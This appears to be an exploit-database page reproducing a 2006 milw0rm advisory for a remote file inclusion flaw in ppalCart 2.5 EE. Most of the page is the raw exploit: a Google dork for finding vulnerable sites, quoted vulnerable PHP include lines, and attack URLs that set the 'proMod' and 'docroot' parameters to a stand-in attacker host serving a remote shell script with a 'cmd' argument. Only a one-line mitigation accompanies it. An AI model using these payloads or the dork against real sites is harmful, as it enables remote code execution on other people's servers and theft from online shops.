header-logo
Suggest Exploit
vendor:
ppalCart
by:
momo26
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: ppalCart
Affected Version From: 2.5 EE
Affected Version To: 2.5 EE
Patch Exists: NO
Related CWE: N/A
CPE: a:profitcode:ppalcart:2.5_ee
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

ppalCart V(2.5 EE) Remote File Inclusion

ppalCart V(2.5 EE) is vulnerable to a Remote File Inclusion vulnerability due to the lack of proper sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious URL in the 'proMod' parameter of the 'index.php' and 'mainpage.php' files. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

google dork :"powered by: profitCode"

exploite:
http://[url]/index.php?proMod=http://shell.txt?

discoverde by momo26  ;)!!!!!!!!!!!!!!!

+--------------------------------------------------------------------
+
+  ppalCart V(2.5 EE)  Remote File Inclusion
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: ppalCart 2.5 EE
+ Venedor ...........:   http://www.profitcode.com
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: momo26
+ Writtin by ..........: Eddy_BAck0o - www.LEzr.com/vB
+ Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+ ./index Directory ...
+ [index.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include $docroot . "js/css/shop-custom.php";
+include $docroot . "js/css/shop-default.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 50 - 349
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+else if($proMod) {
+include "$proMod" . ".php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 288 - 349
+Ex --> http://www.victom.com/index.php?proMod=http://yourevil.com/r0x.txt?cmd
+
+-------------------------------------------------------------------
+-------------------------------------------------------------------
+ [mainpage.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" .
".php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 158 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/newitems.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 284 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/specials.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 287 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "cstmincs/cstmbanner$langFile.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 290 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/upselladvert.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 292 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "mainincs/upsellproducts.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 298 - 308
+Ex --> http://www.victom.com/mainpage.php?docroot=http://yourevil.com/r0x.txt?cmd
+
+--------------------------------------------------------------------
+Eddy_BAck0o ;
+--------------------------------------------------------------------

# milw0rm.com [2006-09-07]